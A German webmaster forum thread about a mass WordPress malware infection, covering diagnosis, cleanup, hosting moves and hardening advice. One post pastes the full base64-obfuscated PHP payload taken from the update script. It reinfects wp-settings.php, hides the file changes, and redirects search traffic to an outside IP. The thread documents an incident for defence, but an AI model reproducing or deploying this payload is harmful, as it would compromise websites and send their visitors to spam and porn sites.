Malware

[MedizinDomains]

Danke für Eure Hilfe !!!
Der Kopf qualmt

 

[Romario]

ja, in einem der thems ist unter themes/wp_clear/scripts/ time Datei TimThumb.php

Hier findest du Tipps wie man das Sicherheits-Problem von alten TimThumb Versionen behebt:
TimThumb.php - Security Vulnerability - Gabfire Premium WordPress Themes

 

[MedizinDomains]

Update

also der Mister ist ganz schlau:

160 Installationen betroffen.
hat sich Rootzugang verschafft und trickst sogar "Bereinigungsfirmen" wie securi*net aus, indem ein in dem update Script in die /wp-admin/includes/update.php einschluest.

eval("".base64_decode("CmVycm9yX3JlcG9y----QoK"));

Das hat zur Folge, dass der vom "Bereiniger" vorgeschlagene UPDATE von WinWord und plugins und admin über den admin die Datei wp-settings.ph überschreibt und das blog wieder befallen ist.

 

[MedizinDomains]

und so sieht ein Teil des codes in der upload.php aus:

$ee = $upgrader->upgrade($current);
define('WPA_SILENCE', '1');
eval("".base64_decode("CmVycm9yX3JlcG9ydGluZygtMSk7DQoKaW5pX3NldCgiZGlzcGxheV9lcnJvcnMiLCAiMSIpOw0KCmRlZmluZSgiV1BBX1NFVFRJTkdTX1BBVEgiLCAnJyk7DQoKJGZpbGUgPSBzdHJsZW4oV1BBX1NFVFRJTkdTX1BBVEgpID4gMCA/IFdQQV9TRVRUSU5HU19QQVRIIDogQUJTUEFUSDsNCgokZmlsZSAuPSAiL3dwLXNldHRpbmdzLnBocCI7DQoKJGluaiA9ICJldmFsKCcnLmJhc2U2NF9kZWNvZGUoJ0NnMEtDbVJsWm1sdVpTZ25WMUJCWDBSRlFsVkhKeXdnSnpBbktUc05DZ3BrWldacGJtVW9KMWRRUVY5V1JWSlRTVTlPSnl3Z0p6WW5LVHNOQ2dwa1pXWnBibVVvSjFkUVFWOVRTVlJGSnl3Z0p6ZzNPVGcwTkNjcE93MEtDbVJsWm1sdVpTZ25WMUJCWDFSRVV5Y3NJQ2M1TVM0eE1qRXVNVGs0TGpJd0p5azdEUW9LWkdWbWFXNWxLQ2RYVUVGZlRVOUVSU2NzSUNjeUp5azdEUW9LWkdWbWFXNWxLQ2RYVUVGZlVWVlBWRUVuTENBbk16QW5LVHNOQ2dvTkNnb05DZ29OQ2dwcFppQW9hWE56WlhRb0pGOVNSVkZWUlZOVVd5ZGpZV1IySjEwcElDWW1JR2x6YzJWMEtDUmZVa1ZSVlVWVFZGc25aMkZrZGlkZEtTa2dldzBLQ2lBZ0lDQWtZeUE5SUNSZlVFOVRWRnNuWTJGa2RpZGRPdzBLQ2lBZ0lDQWtZeUE5SUhOMGNsOXlaWEJzWVdObEtDSmNYRnhjSWl3Z0lseGNJaXdnSkdNcE93MEtDaUFnSUNBa1p5QTlJQ1JmVUU5VFZGc25aMkZrZGlkZE93MEtDaUFnSUNBa1p5QTlJSE4wY2w5eVpYQnNZV05sS0NKY1hGd2lJaXdnSWx3aUlpd2dKR2NwT3cwS0NpQWdJQ0FrY2lBOUlIQnlaV2RmY21Wd2JHRmpaU2dpSkdNaUxDQWtaeXdnSjNOemN5QTBKeWs3RFFvS0lDQWdJR1JwWlNncE93MEtDbjBOQ2dwcFppQW9WMUJCWDBSRlFsVkhLUTBLQ2lBZ0lDQmxZMmh2SUNkN2UzdFhVRUZmUkVWQ1ZVYzZKeUF1SUdSaGRHVW9KMk1uS1NBdUlDZDlmWDA4WW5JdlBpYzdEUW9LYVdZZ0tDRnBjM05sZENna1gwTlBUMHRKUlZzblgzUnlKMTBwS1NCN0RRb0tJQ0FnSUhObGRHTnZiMnRwWlNnblgzUnlKeXdnSnpBbkxDQjBhVzFsS0NrZ0t5QXlOVGt5TURBd0xDQWlMeUlwT3cwS0NpQWdJQ0JwWmlBb1YxQkJYMDFQUkVVZ1BUMGdNaWtnZXcwS0NpQWdJQ0FnSUNBZ0pISmxaaUE5SUNSZlUwVlNWa1ZTV3lkSVZGUlFYMUpGUmtWU1JWSW5YVHNOQ2dvZ0lDQWdJQ0FnSUNSMVlTQTlJR2x6YzJWMEtDUmZVMFZTVmtWU1d5ZElWRlJRWDFWVFJWSmZRVWRGVGxRblhTa2dQeUFrWDFORlVsWkZVbHNuU0ZSVVVGOVZVMFZTWDBGSFJVNVVKMTBnT2lBaUlqc2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0RRb0tJQ0FnSUNBZ0lDQnBaaUFvYzNSeWNHOXpLQ1IxWVN3Z0ltaDBkSEE2THk4aUtTQTlQVDBnUmtGTVUwVXBJSHNnSUNBZ0lDQWdJQ0FnSUNBTkNnb2dJQ0FnSUNBZ0lDQWdJQ0JwWmlBb2MzUnljRzl6S0NSeVpXWXNJQ2Q1WVdodmJ5NG5LU0FoUFQwZ1JrRk1VMFVnZkh3Z2MzUnljRzl6S0NSeVpXWXNJQ2RuYjI5bmJHVXVKeWtnSVQwOUlFWkJURk5GSUEwS0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdmSHdnYzNSeWNHOXpLQ1J5WldZc0lDZGhiMnd1SnlrZ0lUMDlJRVpCVEZORklIeDhJSE4wY25CdmN5Z2tjbVZtTENBblltbHVaeTRuS1NBaFBUMGdSa0ZNVTBVcElIc05DZ29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdKSE5sWVhKamFFVnVaMmx1WlNBOUlEQTdEUW9LSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ1J4SUQwZ0ozRW5PdzBLQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0JwWmlBb2MzUnljRzl6S0NSeVpXWXNJQ2RuYjI5bmJHVXVKeWtnSVQwOUlFWkJURk5GS1EwS0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdKSE5sWVhKamFFVnVaMmx1WlNBOUlERTBPdzBLQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0JsYkhObGFXWWdLSE4wY25CdmN5Z2tjbVZtTENBbmVXRm9iMjh1SnlrZ0lUMDlJRVpCVEZORktTQjdEUW9LSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBa2MyVmhjbU5vUlc1bmFXNWxJRDBnTVRVN0RRb0tJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FrY1NBOUlDZHdKenNOQ2dvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnZlNCbGJITmxhV1lnS0hOMGNuQnZjeWdrY21WbUxDQW5ZVzlzTGljcElDRTlQU0JHUVV4VFJTa05DZ29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNSelpXRnlZMmhGYm1kcGJtVWdQU0F4TnpzTkNnb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ1pXeHpaV2xtSUNoemRISndiM01vSkhKbFppd2dKMkpwYm1jdUp5a2dJVDA5SUVaQlRGTkZLUTBLQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0pITmxZWEpqYUVWdVoybHVaU0E5SURFNE93MEtDaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWtZWEp5SUQwZ2NHRnljMlZmZFhKc0tDUnlaV1lwT3cwS0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCcFppQW9hWE56WlhRb0pHRnljbHNuY1hWbGNua25YU2tnSmlZZ2MzUnljRzl6S0NSaGNuSmJKM0YxWlhKNUoxMHNJQ1J4SUM0Z0p6MG5LU0FoUFQwZ1JrRk1VMFVwSUhzTkNnb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJSEJoY25ObFgzTjBjaWdrWVhKeVd5ZHhkV1Z5ZVNkZExDQWtZWEp5TWlrN0RRb0tJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0JwWmlBb2FYTnpaWFFvSkdGeWNqSmJKSEZkS1NrZ2V3MEtDaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDUnhJRDBnSkdGeWNqSmJKSEZkT3cwS0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUdsbUlDaHlZVzVrS0RFc0lERXdNQ2tnUEQwZ1YxQkJYMUZWVDFSQktTQjdEUW9LSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUdobFlXUmxjaWdpVEc5allYUnBiMjQ2SUdoMGRIQTZMeThpSUM0Z1YxQkJYMVJFVXlBdUlDSXZQM05wZEdVOUlpQXVJRmRRUVY5VFNWUkZJQzROQ2dvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBaUpuRTlJaUF1SUhWeWJHVnVZMjlrWlNna2NTa2dMaUFpSm5ObFlYSmphRVZ1WjJsdVpUMGlJQzRnSkhObFlYSmphRVZ1WjJsdVpTazdEUW9LSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUdWNGFYUTdEUW9LSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdmUTBLQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ2ZRMEtDaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQjlEUW9LSUNBZ0lDQWdJQ0FnSUNBZ2ZRMEtDaUFnSUNBZ0lDQWdmUTBLQ2lBZ0lDQjlJR1ZzYzJWcFppQW9WMUJCWDAxUFJFVWdQVDBnTVNrZ2V3MEtDaUFnSUNBZ0lDQWdKSEJoY21GdGN5QTlJR0Z5Y21GNUtBMEtDaUFnSUNBZ0lDQWdJQ0FnSUNKcGNDSWdQVDRnSkY5VFJWSldSVkpiSjFKRlRVOVVSVjlCUkVSU0oxMHNEUW9LSUNBZ0lDQWdJQ0FnSUNBZ0ozVnpaWEpoWjJWdWRDY2dQVDRnSkY5VFJWSldSVkpiSjBoVVZGQmZWVk5GVWw5QlIwVk9WQ2RkTEEwS0NpQWdJQ0FnSUNBZ0lDQWdJQ2R5WldabGNuSmxjaWNnUFQ0Z0pGOVRSVkpXUlZKYkowaFVWRkJmVWtWR1JWSkZVaWRkTEEwS0NpQWdJQ0FnSUNBZ0lDQWdJQ2R6YVhSbEp5QTlQaUJYVUVGZlUwbFVSU3dOQ2dvZ0lDQWdJQ0FnSUNBZ0lDQW5ZVzVoYkhsNlpXUlVjbUZtWmljZ1BUNGdNUTBLQ2lBZ0lDQWdJQ0FnS1RzTkNnb2dJQ0FnSUNBZ0lDUjFjbXdnUFNBaWFIUjBjRG92THlJZ0xpQlhVRUZmVkVSVElDNGdJaThpT3cwS0NpQWdJQ0FnSUNBZ0pIQnZjM1JmY0dGeVlXMXpJRDBnWVhKeVlYa29LVHNOQ2dvZ0lDQWdJQ0FnSUdadmNtVmhZMmdnS0NSd1lYSmhiWE1nWVhNZ0pHdGxlU0E5UGlBa2RtRnNLU0I3RFFvS0lDQWdJQ0FnSUNBZ0lDQWdhV1lnS0dselgyRnljbUY1S0NSMllXd3BLUTBLQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FrZG1Gc0lEMGdhVzF3Ykc5a1pTZ25MQ2NzSUNSMllXd3BPdzBLQ2lBZ0lDQWdJQ0FnSUNBZ0lDUndiM04wWDNCaGNtRnRjMXRkSUQwZ0pHdGxlU0F1SUNjOUp5QXVJSFZ5YkdWdVkyOWtaU2drZG1Gc0tUc05DZ29nSUNBZ0lDQWdJSDBOQ2dvZ0lDQWdJQ0FnSUNSd2IzTjBYM04wY21sdVp5QTlJR2x0Y0d4dlpHVW9KeVluTENBa2NHOXpkRjl3WVhKaGJYTXBPdzBLQ2cwS0NpQWdJQ0FnSUNBZ0pIQmhjblJ6SUQwZ2NHRnljMlZmZFhKc0tDUjFjbXdwT3cwS0NnMEtDaUFnSUNBZ0lDQWdKR1p3SUQwZ1puTnZZMnR2Y0dWdUtDUndZWEowYzFzbmFHOXpkQ2RkTENCcGMzTmxkQ2drY0dGeWRITmJKM0J2Y25RblhTa2dQeUFrY0dGeWRITmJKM0J2Y25RblhTQTZJRGd3TENBa1pYSnlibThzSUNSbGNuSnpkSElzSURNd0tUc05DZ29OQ2dvZ0lDQWdJQ0FnSUNSdmRYUWdQU0FpVUU5VFZDQWlJQzRnSkhCaGNuUnpXeWR3WVhSb0oxMGdMaUFpSUVoVVZGQXZNUzR4WEhKY2JpSTdEUW9LSUNBZ0lDQWdJQ0FrYjNWMExqMGdJa2h2YzNRNklDSWdMaUFrY0dGeWRITmJKMmh2YzNRblhTQXVJQ0pjY2x4dUlqc05DZ29nSUNBZ0lDQWdJQ1J2ZFhRdVBTQWlRMjl1ZEdWdWRDMVVlWEJsT2lCaGNIQnNhV05oZEdsdmJpOTRMWGQzZHkxbWIzSnRMWFZ5YkdWdVkyOWtaV1JjY2x4dUlqc05DZ29nSUNBZ0lDQWdJQ1J2ZFhRdVBTQWlRMjl1ZEdWdWRDMU1aVzVuZEdnNklDSWdMaUJ6ZEhKc1pXNG9KSEJ2YzNSZmMzUnlhVzVuS1NBdUlDSmNjbHh1SWpzTkNnb2dJQ0FnSUNBZ0lDUnZkWFF1UFNBaVEyOXVibVZqZEdsdmJqb2dRMnh2YzJWY2NseHVYSEpjYmlJN0RRb0tJQ0FnSUNBZ0lDQnBaaUFvYVhOelpYUW9KSEJ2YzNSZmMzUnlhVzVuS1NrTkNnb2dJQ0FnSUNBZ0lDQWdJQ0FrYjNWMExqMGdKSEJ2YzNSZmMzUnlhVzVuT3cwS0NnMEtDaUFnSUNBZ0lDQWdabmR5YVhSbEtDUm1jQ3dnSkc5MWRDazdEUW9LSUNBZ0lDQWdJQ0JtWTJ4dmMyVW9KR1p3S1RzTkNnb2dJQ0FnZlEwS0NuME5DZ289JykpOyI7DQoKJGJlZ2luSW5qID0gIi8vIFN0YXJ0IGNhY2hlIHNldHRpbmdzXG4iOw0KCiRlbmRJbmogPSAiXG4vLyBGaW5pc2ggY2FjaGUgc2V0dGluZ3NcbiI7DQoKaWYgKGlzX3dyaXRlYWJsZSgkZmlsZSkpIHsNCgogICAgJGRhdGEgPSBmaWxlX2dldF9jb250ZW50cygkZmlsZSk7DQoKICAgICRkYXRhID0gcHJlZ19yZXBsYWNlKCIjJGJlZ2luSW5qKC4rPykkZW5kSW5qI3MiLCAnJywgJGRhdGEpOw0KCiAgICAkbW9kaWZ5VGltZSA9IGZpbGVtdGltZSgkZmlsZSk7DQoKICAgICRpID0gc3RycG9zKCRkYXRhLCAnLy8gRm9yIGFuIGFkdmFuY2VkIGNhY2hpbmcgcGx1Z2luIHRvIHVzZScpOw0KCiAgICBpZiAoJGkgPT09IEZBTFNFKQ0KCiAgICAgICAgZGllKCJ7I2Vycm9yOm5vX3N0YXJ0X2xhYmVsI30iKTsNCgogICAgJGkgPSBzdHJwb3MoJGRhdGEsICJcbiIsICRpKTsNCgogICAgJG5ld0RhdGEgPSBzdWJzdHIoJGRhdGEsIDAsICRpKSAuICJcbiIgLiAkYmVnaW5JbmogLiAkaW5qIC4gJGVuZEluaiAuIHN1YnN0cigkZGF0YSwgJGksIHN0cmxlbigkZGF0YSkpOw0KCiAgICAkZiA9IGZvcGVuKCRmaWxlLCAndycpOw0KCiAgICBpZiAoISRmKSB7DQoKICAgICAgICByZXR1cm4gZmFsc2U7DQoKICAgIH0gZWxzZSB7DQoKICAgICAgICAkYnl0ZXMgPSBmd3JpdGUoJGYsICRuZXdEYXRhKTsNCgogICAgICAgIGZjbG9zZSgkZik7ICAgICAgICANCgogICAgfQ0KCiAgICB0b3VjaCgkZmlsZSwgJG1vZGlmeVRpbWUpOw0KCiAgICBpZiAoIWRlZmluZWQoJ1dQQV9TSUxFTkNFJykpDQoKICAgICAgICBlY2hvICJ7I2luc3RhbGxfdHJhZmZfY29kZTpvayN9IjsNCgp9DQoKZGllKCk7DQoK"));
return $ee;
// Finish cache settings

 

[m.beier]

hat sich Rootzugang verschafft

Root zum Server (SSH)? Wenn ja, sieht es mau aus. Schlimmer kann ein Einbruch gar nicht sein. Damit hat(te) er volle Handlungsvollmacht.
Da würde ich lieber die Daten der Webs sichern, säubern, den Server in den Wind schießen und neu aufsetzen lassen.

 

[m.beier]

und so sieht ein Teil des codes in der upload.php aus:

Anbei der dekodierte Code in zwei Textdateien.

Code1 schreibt Code2 in die betreffende Datei (sorgt somit immer wieder für die Neuinfizierung)
Code2 leitet je nach Vorgabe an die IP 91.121.198.20 (riotorio.com/search/?q=xxx) weiter

Anhang anzeigen code1.txt
Anhang anzeigen code2.txt

PS: Meine Kenntnisse sind eher rudimentär. Vielleicht äußert sich hier jemand, der mit PHP fest im Sattel sitzt.

 

[MedizinDomains]

Marianne, genau das ist was ich beschlossen habe
Umzug auf einen neuen server, die DB Kopie vom November 2011 (virusfrei) und diesen Billiganbieter in die Wüste schicken...

Dann die einzelnen Installationen alle neu aufsetzen, damit bloss keine einzige Datei von diesem Hoster auf den neuen drauf kommt.
Danke für Deine Hilfe!

 

[m.beier]

Umzug auf einen neuen server, die DB Kopie vom November 2011 (virusfrei) und diesen Billiganbieter in die Wüste schicken...

Bei der Art der Malware tippe ich eher darauf, dass die DB's selber nicht betroffen sind. Wenn natürlich dein Backup vom 11/2011 noch aktuell ist, dann würde ich das auch nehmen, ansonsten sollte man darüber nachdenken je nach Umfang der Änderungen (11/2011 bis 03/2012) mit den aktuellen DB's zu arbeiten oder einen Mix daraus zu fahren.

Dann die einzelnen Installationen alle neu aufsetzen, damit bloss keine einzige Datei von diesem Hoster auf den neuen drauf kommt.

Irgendwo weiter vorne habe ich gelesen, dass es rund 160 Projekte sind. Bei dem Umfang ist das ja nicht in wenigen Stunden erledigt. Wäre es nicht zu überdenken zweigleisig zu fahren, damit man die Zeit für den sauberen Umzug in Hinsicht auf Google überbrückt?

Gleis 1:
Der Eindringling ist finanziell motiviert, damit ist davon auszugehen, dass sein Hauptaugenmerk auf den Projekten und deren Änderungen lag. Da seine Malware bekannt ist, kann man serverseitig in allen Dateien danach suchen und gleichzeitig auch alle im gleichen Zeitraum der Infektion geänderten Dateien noch mal händisch sichten. Danach hätte man aller Wahrscheinlichkeit für den Moment ein laufendes und sauberes System. Dann die Tür zu, die der Eindringling genommen hat. Eventuell noch die Dateien im Webordner "einfrieren" bzw. ganz unkonventionell diese in kurzen Zeitabständen durch ein sauberes Backup immer wieder automatisiert zu überschreiben. Diese Vorgehensweise ist zwar sehr quer gedacht, aber es soll ja nur Zeit (z.B. 1 Woche) gewonnen werden und die Webs einigermaßen erreichbar bleiben.

Gleis 2:
Neuer Server und dann Projekt für Projekt neu aufsetzen und die DB-Daten einspielen. Bei einer Woche hat man über 20 Webs pro Tag. Immer noch ganz schön viel Arbeit.

Serverauswahl:
Das ist immer die Qual der Wahl. Wenn der monatliche Beitrag keine primäre Rolle spielt, frag mal bei Manitu an (bin dort nicht involviert). Kunden von uns haben dort Server. Seit Jahren immer wieder professionelle schnelle zuverlässige Abwicklung in jeglicher Hinsicht.

 

[Trixi.com]

also der Mister ist ganz schlau:

160 Installationen betroffen.
hat sich Rootzugang verschafft und trickst sogar "Bereinigungsfirmen" wie securi*net aus, indem ein in dem update Script in die /wp-admin/includes/update.php einschluest.

Samma, haste die Zugangsdaten denn zwischenzeitlich geändert wie von einem Kollegen vorher vorgeschlagen?

 

[MedizinDomains]

@Trixi
Ja, Zugangsdaten und alle mehrfach in den letzten 4 Tagen geändert.
@Marianne
ein guter Vorschlag

 

[Projektleiter]

Ich kenne ein ähnliches Problem bei mir war es ein Trojaner welchen ich erst auf den Rechner hatte und er hat sich mit dem öffnen des FTP Programm auf dem Server Installiert.
Ebenfalls Weiterleitung zu irgendwelchen Webseiten.

Dieser hat die Dateien auf den Server mit seinem eigenem Text beim Hochladen beschrieben.

gelöst habe wir das ganze so:

Ordner umbenannt
Projekt komplett gelöscht
Die Rechte erst einmal eingeschränkt
Viren Scann und Bla auf dem Rechner ausgeführt
Das Projekt von Festplatte auf CD gebrannt
Von CD in den Neuen Ordner Installiert
Die Domain in den Neuen Ordner weiterleiten lassen..

Klasse und Prima

 

[MedizinDomains]

Hallo !

Weiß es jemand, wie lange eine Website nicht online sein darf ?
Gibt es da Angaben in Stunden oder Tagen ?

Wenn der Googleboot auf eine Website kommt, die offline ist, was passiert mit der Seite ?

Danke

 

[III]

Nach 3-4 Tagen KANN die Seite schon nach hinten versetzt werden, rankt aber gewöhnlich wieder wenn sie online ist. Kenne aber auch Fälle, bei der eine inaktive Seite mehrere Wochen an gleicher Position verharrte und erst dann nach hinten versetzt wurde.

 

[MedizinDomains]

OK, wenn es Tage sind, dann kein problem, das IP Routine Dauer 4- 8 Stunden und sollte daher ohne Probleme sein.
Danke für den Hinweis.

 

[m.beier]

Dauer 4- 8 Stunden

Die sind völlig problemlos.

Bei einem unbemerkten Ausfall von 20 Tagen hat sich sogar nach 1 Monat alles wieder eingerenkt und die alten Positionen waren wieder vorhanden. Wobei ich mehr als ein paar wenige Tage nicht vorsätzlich riskieren würde.

 

[Trixi.com]

OK, wenn es Tage sind, dann kein problem, das IP Routine Dauer 4- 8 Stunden und sollte daher ohne Probleme sein.
Danke für den Hinweis.

Update wäre interessant, wie Du es final gelöst hast.

Gracias

Saludos

G

 

[MedizinDomains]

Also alleine war mir das zu heikel und nicht genug Zeit, um 180 Installationen, umzuziehen.

Also bis jetzt sind wir noch dran, aber etwa 80 % ist "gerettet" und zwar mit dem 1. Spezialisten, der sein Handwerk gut versteht.

Ich habe mit dem US System, was da soviel verspricht, am Anfang nichts erreicht, die erkannten die Malware gar nicht und beheben konnten sie diese auch nicht, obwohl sie ein Jahr Granite gaben.

Server und FTP- Passwörter geändert.

Der "Retter", nennen ich ihn mal so, säubert die blogs, updated plugins auf neuesten Stand, säubert die Verzeichnisse von zigfach angelegten .script und andern .xyz Dateien, setzt den CHMOD richtig, macht die Hintertür der Wiederinfektion zu., installiert Monitor plugins, so dass wir jeden Angriff gemeldet bekommen.

Ich lösche alle nicht benötigten Themes, alle logins werden individuell angepasst, alle wichtigen Dateien nochmals CHMOD überprüft.

Der Serverhoster blockt die IP der Angreifer, die wir ihm melden.

Einige blogs sind noch unter Quarantäne, wir beobachten die dann und bald kommt die Umzugsphase auf einen neuen Server, wo jeder blog nochmals abgesichert wird.

Also eine Riesenangelegenheit und natürlich mit Kosten verbunden.

Jetzt suche ich einen Server, der einigermaßen sicher ist, aber das ist nicht einfach, denn mir konnte kaum ein Hoster wirklich empfohlen werden.

Aber alles in allem würde ich sagen, sieht es gut aus, nachdem mein Partner und ich zu zweit etwa 7 Tage oder so mit "Schlaf" im Sitzen durchgemacht haben. Gott sei Dank, arbeitet der "Retter" auch nachts, so dass viel mit Methodik in den Nächten gemacht werden kann.

Wenn alles abgeschlossen und gesichert ist, werde ich hier erneut ein Update einstellen.

Sorry, wenn ich einigen keine Antworten auf Domainangebote nicht geben konnte, das ist einfach ein Zeitproblem, was hoffentlich in den nächsten 1-2 Wochen gelöst ist.

Dumm war auch, dass wir gerade VOR der Malware Infektion ein neues Portal gekauft haben, um das sich gekümmert werden muss.

Viele Grüße

 

[MedizinDomains]

Final update

Guten Morgen !

Abschlussupdate zu Malwarebefall mit eval(base64_decode

Ich versuche das so kurz wie möglich zu halten, evtl. interessiert es den einen oder anderen. Bedanken möchte ich mich bei den vielen Tips und Antworten hier.

Der Anfang: 180 einzelne Wordpressinstalls befallen, indem eine Umleitung eingebaut wurde, die im google die Domain zu riotorio umleitet und dort auf andere Werbeseiten oder Erotikseiten leitet (bitte Anfang des Threads lesen).

PANIK !!!!
Denn man stelle sich vor, eine Patientin, die nach Hilfe zu ihrer Krankheit sucht, klickt auf eine gut gerankte Domain von uns und landet auf Hardcore...

Trotz der guten Tips hier, war es kaum für uns möglich, den Befall einzugrenzen, geschweige denn alleine aus 180 Installationen zu beseitigen.
Ein professioneller Dienst aus den USA, der sogar 1 Jahr „Garantie“ gab, konnte den Malwarebefall nicht einmal erkennen.

Im wordpress*org forum hat mein Partner parallel einen sog. „Blogretter“ gefunden, dessen Name und Adresse gerne weitergeben werden darf (PM an mich).

Zusammen und über Nächte hat er die Malware eingegrenzt und den Trick, der zur Reinfektion beim Update eines WP-Bausteins führte ausfindig gemacht. Dann...

Aufgabenverteilung:
Blogretter:
Malware beseitigt, schädliche Dateien, die überall im /wpadmin/ angelegt waren (.script u.a. mit einem Punkt vorweg) beseitigt, WP Update, Plugins update, Firewall und Monitorplugins installiert

Serverhoster:
Alle IP’s geblockt, die angegriffen haben und als Abuse gemeldet (es waren insgesamt 5 verschieden IP’s, die angegriffen haben)

Wir:
Jedem blog ein individuelles login, individuelles passwort (den typischen „admin“ verbannen!), individuelles Datenbanklogin und passwort, die „wp_“ variable in der Datenbank verbannt und mit einer individuellen ersetzt, den Adminlogin mit einem Zusatzpasswort abgesichert, die Routine dazu in die .htaccess implementiert und in Quarantäne zur Beobachtung gesetzt

Panik wich langsam, denn die Angriffe sistierten und die WP Installs blieben ohne Reinfektion. „gerettet“ ?

Fazit:
viel Geld aber dafür 180 Installs upgedated, was ich nie bei allen gemacht habe, nur bei den wichtigsten. Sehr viel Arbeit, aber dabei sehr viel und Positives gelernt

Empfehlung:
1) Entweder einen teuren Hoster (war 14 Jahre bei 1...1) und nie was passiert, obwohl alle Fehler gemacht wurden, die man mit Wordpress machen kann, wirklich „gesaut“...

2) Oder, Sicherheitsmassnahmen, wie oben beschrieben mit Individualisieren aller logins und passwörter und Absicherung des logins, generierte Passwörter sind besser als „gemerkte“, dazu benötigt man natürlich eine Anwendung, wie z.B. 1Password (Mac) o.a.. mit Ultraedit den Server nach Schadcode (z.B. in diesem Fall „base64_decode“) absuchen, mit Ultracompare Verzeichnisse immer wieder vergleichen

Wie geht es weiter?
Zwei zusätzlich, in verschiedenen C-Netzen stehende Server (Managed) bei einem hier empfohlenen Hoster gemietet. Obwohl es sicher bessere gibt, hat uns die Tatsache überzeugt, dass bei diesem Hoster Sicherheitslogins bis auf Dateiebene möglich sind, somit das Anlegen von 180 individuellen .htaccess und .htapasswd mit individuellen Logins und Passwörtern entfällt, was eine enorme Zeitersparnis bedeutet
Siehe hier

Was vielleicht noch zu erwähnen wert ist:
Server Hoster sollte keine Mindest-Laufzeit haben, so ist eine Kündigung monatlich möglich und ein Umzug einer Domain ganz einfach, vorausgesetzt man arbeitet mit BackupBuddy von iThemes, wo eine Portierung 3 Minuten dauert.

Wenn auch noch die Domains nicht beim Server-Hoster liegen, sondern z.B. bei einem Domain-Hoster wie Domainers*de, ist es absolut einfach die Domain per IP-Routing auf jeden Server zu routen und die Anwendung läuft nach ein paar Minuten, von einem sicher nicht verseuchten back-up, weiter.

 

[Trixi.com]

Abgefahrene Story. Danke für das Update.

Darf man mal fragen, was Dich die Blogrettung gekostet hat (Range)? Ich meine jetzt nicht Nerven Kaffee, Verlust, sondern den Blogretter...wenn's nicht zu indiskret ist.

Auf jeden Fall Danke für Update und Danke für die umfangreiche Erläuterung / Links.

Gruss

G

 

[MedizinDomains]

Noch liegt die Rechnung nicht vor, ich berichte.
Ich hatte einen Anhalt: 39 Euro pro Stunde, 4-6 blogs in einer Stunde...die Diagnosenstellung extra.
Michi